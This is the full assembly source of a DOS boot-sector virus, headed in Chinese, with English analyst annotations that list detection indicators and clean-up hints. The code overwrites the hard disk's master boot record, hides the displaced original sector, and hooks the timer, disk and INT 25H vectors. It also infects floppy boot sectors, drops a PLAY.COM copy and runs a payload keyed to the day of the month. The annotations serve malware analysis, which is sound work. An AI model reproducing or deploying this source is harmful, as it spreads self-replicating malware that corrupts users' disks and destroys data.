DOS环境下的一个引导型病毒
; Analyst annotation: single code segment, MASM syntax. No ORG directive appears
; in this listing, so label offsets are relative to 0.
CSEG SEGMENT
ASSUME CS:CSEG
; Entry point: dispatches on the value of CS.
;   CS == 0  -> START (the path that works on memory at 0000:7C00)
;   CS != 0  -> FILE  (the path that ends in DOS INT 21H AH=4CH)
; NOTE(review): presumably CS == 0 corresponds to the BIOS having loaded this
; sector at 0000:7C00 and CS != 0 to execution as a DOS program - confirm.
BEGIN: MOV AX,CS
CMP AX,0
JZ START                    ; CS is zero: take the boot-sector path
JMP FILE                    ; otherwise: take the DOS-program path
;********************************** DATA
; Data embedded between the entry dispatch and START. For triage, the values
; below are the fixed constants visible in this listing: marker byte 77H,
; far pointers 0000:7C00 and 0020:NEXT, and the file name 'PLAY.COM'.
DATE DB 00H                 ; day byte: written from DL after INT 1AH AH=04H (at NC), compared with 15H in GR
PZ DB 77H                   ; marker byte: NEXT and FILE compare the byte at this offset with 77H
TIME DW 200H                ; countdown decremented by NEW08 on every INT 8; reloaded with 200H when it hits zero
JMPA DW 7C00H               ; far pointer, offset part  (target 0000:7C00, used by the JMP after NC)
DW 0000H                    ; far pointer, segment part
JMPN DW OFFSET NEXT         ; far pointer, offset part  (target 0020:NEXT, used at the end of START)
DW 0020H                    ; far pointer, segment part: segment 0020H = linear address 200H
FN DB 'PLAY.COM',0          ; ASCIIZ file name passed to INT 21H AH=3CH in NEWF
;************************************
; START - boot path. Zeroes DS/SS/ES, sets SP to 7C00H, keeps a copy of the
; current INT 8 vector, copies 200H bytes from 0000:7C00 to 0000:0200 and
; continues execution in that copy through the far pointer JMPN (0020:NEXT).
; Analyst note: linear 200H-3FFH is the upper half of the real-mode interrupt
; vector table (slots for vectors 80H-FFH), so the copy sits in low memory
; rather than in memory taken from the reported top of RAM.
START: XOR AX,AX
MOV DS,AX
MOV SS,AX
MOV ES,AX
MOV SP,7C00H
MOV AX,DS:[20H] ;SAVE INT 8H - 0:20H = 4*08H, offset word of the INT 8 vector
MOV DS:[180H],AX            ; 0:180H = 4*60H, so INT 60H now reaches the previous INT 8 handler
MOV AX,DS:[22H]             ; segment word of the INT 8 vector
MOV DS:[182H],AX
MOV SI,SP                   ; source DS:SI = 0000:7C00
MOV DI,0200H                ; destination ES:DI = 0000:0200
MOV CX,0200H                ; 200H bytes = one 512-byte sector
CLD
REP MOVSB
MOV BX,OFFSET JMPN+7C00H    ; address of the JMPN far pointer inside the image still at 7C00H
JMP DWORD PTR CS:[BX]       ; far jump to 0020:NEXT, i.e. NEXT inside the copy at linear 200H
; NEXT - runs from the copy at 0020:0000 with DS = ES = 0 (set in START).
;  1. Points the INT 8 vector at 0020:NEW08.
;  2. Reads drive 80H, cylinder 0, head 0, sector 1 into 0000:0600 and tests
;     the byte at offset PZ for the marker 77H.
;  3. If the marker is absent: writes the sector just read to sector 17H of
;     the same track, then writes the 200H-byte copy from 0000:0200 to sector 1.
;  4. NC: reads sector 17H into 0000:7C00, stores the RTC day byte in DATE and
;     far-jumps to 0000:7C00 via JMPA.
; Indicators visible here: byte 77H at offset PZ of sector 1 on drive 80H, and
; a displaced copy of the previous sector 1 at cylinder 0, head 0, sector 17H.
; NOTE(review): that displaced sector is what a clean-up would restore to
; sector 1 - verify its contents before writing anything back.
NEXT: MOV AX,OFFSET NEW08 ;MODI INT 8H - new INT 8 offset
MOV DS:[20H],AX
MOV AX,0020H                ; new INT 8 segment
MOV DS:[22H],AX
MOV BX,0600H                ; buffer ES:BX = 0000:0600
MOV AX,0201H                ; INT 13H AH=02H read, AL=01H one sector
MOV CX,0001H                ; CH=00H cylinder 0, CL=01H sector 1
MOV DX,0080H                ; DH=00H head 0, DL=80H first hard disk
INT 13H
CMP BYTE PTR ES:[PZ+0600H],077H ; marker already present in the sector on disk?
JZ NC                       ; yes: skip both writes
MOV AX,0301H                ; INT 13H AH=03H write, one sector
MOV CX,0017H                ; cylinder 0, sector 17H
MOV DX,0080H
INT 13H                     ; BX is not reloaded; the buffer is still 0000:0600 if INT 13H preserved BX
MOV SI,0200H                ; source DS:SI = 0000:0200 (the copy made in START)
MOV DI,0600H                ; destination ES:DI = 0000:0600 (the sector buffer)
MOV CX,0200H                ; all 200H bytes of the buffer are replaced
CLD
REP MOVSB
MOV AX,0301H                ; write one sector
MOV CX,0001H                ; cylinder 0, sector 1
MOV DX,0080H
INT 13H
NC: MOV BX,7C00H            ; buffer ES:BX = 0000:7C00
MOV AX,0201H                ; read one sector
MOV CX,0017H                ; cylinder 0, sector 17H (the sector written above when the marker was absent)
MOV DX,0080H
INT 13H
MOV AH,04H                  ; INT 1AH AH=04H: read real-time-clock date, DL = day (BCD)
INT 1AH
MOV CS:[DATE],DL            ; keep the day byte for the comparison in GR
MOV BX,OFFSET JMPA
JMP DWORD PTR CS:[BX]       ; far jump to 0000:7C00, the sector just read
;***********************************RUN HD BOOTER PRG
; NEW08 - INT 8 handler installed by NEXT. Decrements TIME on every call and
; chains to the previous INT 8 handler through INT 60H. When TIME reaches
; zero it rewrites three vectors (all with segment 0020H) and reloads TIME:
;   0:20H (INT 8)   -> GR
;   0:4CH (INT 13H) -> NEW13, previous vector kept at 0:184H (= INT 61H slot)
;   0:94H (= 4*25H, INT 25H) -> NEWF, previous vector not kept
; NOTE(review): the 200H-tick delay presumably lets DOS finish installing its
; own vectors before they are replaced - not stated in the listing.
; Detection note: INT 8, INT 13H and INT 25H vectors with segment 0020H, and
; INT 60H/61H slots holding copies of handler addresses, are observable in
; a memory dump of the vector table.
NEW08: PUSH AX
PUSH DS
DEC CS:[TIME]               ; one tick elapsed
JNZ I08                     ; countdown not finished: just chain
XOR AX,AX
MOV DS,AX                   ; DS = 0 to address the vector table
MOV AX,DS:[4CH]             ; current INT 13H offset
MOV DS:[184H],AX            ; kept at 0:184H = 4*61H
MOV AX,DS:[4EH]             ; current INT 13H segment
MOV DS:[186H],AX
MOV AX,OFFSET GR ;MODI INT 8H - INT 8 offset now GR
MOV DS:[20H],AX
MOV AX,OFFSET NEW13         ; INT 13H offset
MOV DS:[4CH],AX
MOV AX,OFFSET NEWF          ; offset for the vector at 0:94H
MOV DS:[94H],AX
MOV AX,0020H                ; common segment for the three vectors
MOV DS:[22H],AX
MOV DS:[4EH],AX
MOV DS:[96H],AX
MOV CS:[TIME],200H          ; reload the countdown
I08: POP DS
POP AX
INT 60H                     ; previous INT 8 handler (vector copied to 0:180H in START)
IRET
;***************************************
; NEW13 - INT 13H handler installed by NEW08. The previous handler is reached
; through INT 61H.
;   AH=02H (read), or AH=03H (write) with DL<>0: if the request is DX=0080H and
;       CX=0001H (drive 80H, head 0, cylinder 0, sector 1), CX is changed to
;       0017H before chaining, so the caller is served sector 17H instead.
;   AH=03H with DL=00H: first writes one sector from CS:0000 to drive 00H,
;       cylinder 0, head 0, sector 1, then chains the caller's own request.
;       No read of that sector precedes the write in this listing, so its
;       previous contents are not kept anywhere by this code.
;   Any other AH: chained unchanged.
; Analyst note: because of the CX substitution, reading sector 1 of drive 80H
; through INT 13H while this handler is installed does not return what is
; stored in sector 1; examine the disk from a known-clean boot instead.
NEW13: CMP AH,02H
JZ CNE                      ; read request: check whether it targets sector 1 of drive 80H
CMP AH,03H
JNZ I13                     ; neither read nor write: pass through
CMP DL,00H
JNZ CNE                     ; write to a drive other than 00H: same check as for reads
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH ES
PUSH CS
POP ES                      ; ES = CS, buffer will be CS:0000
MOV AX,0301H                ; write one sector
XOR BX,BX                   ; ES:BX = CS:0000
MOV CX,0001H                ; cylinder 0, sector 1
MOV DX,BX                   ; DH=0 head 0, DL=0 drive 00H
INT 61H                     ; previous INT 13H handler
POP ES
POP DX
POP CX
POP BX
POP AX
JMP I13                     ; now perform the caller's original write
CNE: CMP DX,0080H           ; drive 80H, head 0?
JNZ I13
CMP CX,0001H                ; cylinder 0, sector 1?
JNZ I13
MOV CX,0017H                ; substitute sector 17H
I13: INT 61H                ; previous INT 13H handler
IRET
;*******************************************
; NEWF - handler that NEW08 installs at vector slot 0:94H (= 4*25H).
; Creates the file named by FN ('PLAY.COM') with attribute 01H, writes 400H
; bytes starting at CS:0000 into it, closes it, sets video mode 03H and then
; jumps to NCF, which issues INT 21H AH=4CH. It never returns to its caller.
; No error check follows the create call; AX is used as the handle as-is.
; Indicator: a 400H-byte read-only file PLAY.COM appearing in the current
; directory (the name carries no drive or path).
NEWF: PUSH CS
POP DS                      ; DS = CS so DS:DX addresses data in this segment
MOV DX,OFFSET FN            ; DS:DX -> 'PLAY.COM',0
MOV CX,00000001B            ; file attribute bit 0 set (read-only)
MOV AH,3CH                  ; INT 21H AH=3CH: create file
INT 21H
MOV BX,AX                   ; returned value used as file handle
MOV AH,40H                  ; INT 21H AH=40H: write to handle
MOV CX,400H                 ; byte count 400H
XOR DX,DX                   ; buffer DS:DX = CS:0000
INT 21H
MOV AH,3EH                  ; INT 21H AH=3EH: close handle
INT 21H
MOV AX,0003H                ; INT 10H AH=00H, AL=03H: set video mode 3
INT 10H
JMP NCF                     ; terminate via INT 21H AH=4CH
; GR - INT 8 handler that replaces NEW08 once the TIME countdown has expired.
; On every call it issues INT 10H AH=09H (write character and attribute at the
; cursor) with AL=00H and CX=1, then chains to the previous INT 8 handler via
; INT 60H. BX is set to 0007H (BH=0, BL=07H) unless DATE equals 15H; in that
; case BX is left with whatever value the interrupted code had.
; NOTE(review): DATE is the BCD day byte stored at NC, so 15H presumably means
; the 15th of the month - confirm against the RTC format.
GR: PUSH AX
PUSH BX
PUSH CX
MOV AX,0900H                ; AH=09H write char+attribute, AL=00H character
MOV CX,0001H                ; repeat count 1
CMP CS:[DATE],15H
JZ GR1                      ; DATE = 15H: skip loading BX
MOV BX,111B                 ; BH=00H page 0, BL=07H attribute
GR1: INT 10H
NG: POP CX                  ; label NG is not referenced anywhere in this listing
POP BX
POP AX
INT 60H                     ; previous INT 8 handler
IRET
;************************************
; FILE - path taken when CS is non-zero at BEGIN.
;  1. Tests the byte at 0000:(200H+PZ) for 77H, i.e. the marker position inside
;     the 200H-byte copy that START places at 0000:0200. If present, exits.
;  2. Otherwise stores 77H at that address, reads drive 80H cylinder 0, head 0,
;     sector 1 into CS:0300 and writes that buffer to sector 17H.
;  3. Copies 1B0H bytes from CS:0100 over the start of the buffer and writes
;     the buffer to sector 1. Bytes from offset 1B0H onward of the sector that
;     was read (where a standard MBR keeps its partition table and 55AAH
;     signature) stay as read.
;  4. NCF: terminates with INT 21H AH=4CH.
; Unlike NEXT, this path tests only the marker in memory and does not test the
; sector read from disk before writing it to sector 17H.
; NOTE(review): SI=0100H presumably refers to the load offset of a .COM image.
FILE: PUSH CS
POP ES                      ; ES = CS for the sector buffer
XOR AX,AX
MOV DS,AX                   ; DS = 0
CMP BYTE PTR DS:[200H+PZ],77H ; marker present in low memory?
JZ NCF                      ; yes: nothing more to do, terminate
MOV AH,77H
MOV DS:[200H+PZ],AH         ; set the marker byte in low memory
MOV BX,0300H                ; buffer ES:BX = CS:0300
MOV AX,0201H                ; read one sector
MOV CX,0001H                ; cylinder 0, sector 1
MOV DX,0080H                ; head 0, drive 80H
INT 13H
MOV AX,0301H                ; write one sector
MOV CX,0017H                ; cylinder 0, sector 17H
MOV DX,0080H
INT 13H
PUSH CS
POP DS                      ; DS = CS for the copy source
MOV SI,0100H                ; source DS:SI = CS:0100
MOV DI,BX                   ; destination ES:DI = CS:0300 if INT 13H preserved BX
MOV CX,01B0H ;CX 1B0H - only the first 1B0H bytes of the buffer are replaced
CLD
REP MOVSB
MOV AX,0301H                ; write one sector
MOV CX,0001H                ; cylinder 0, sector 1
MOV DX,0080H
INT 13H
NCF: MOV AH,4CH             ; INT 21H AH=4CH: terminate process (AL is not set here)
INT 21H
CSEG ENDS
END BEGIN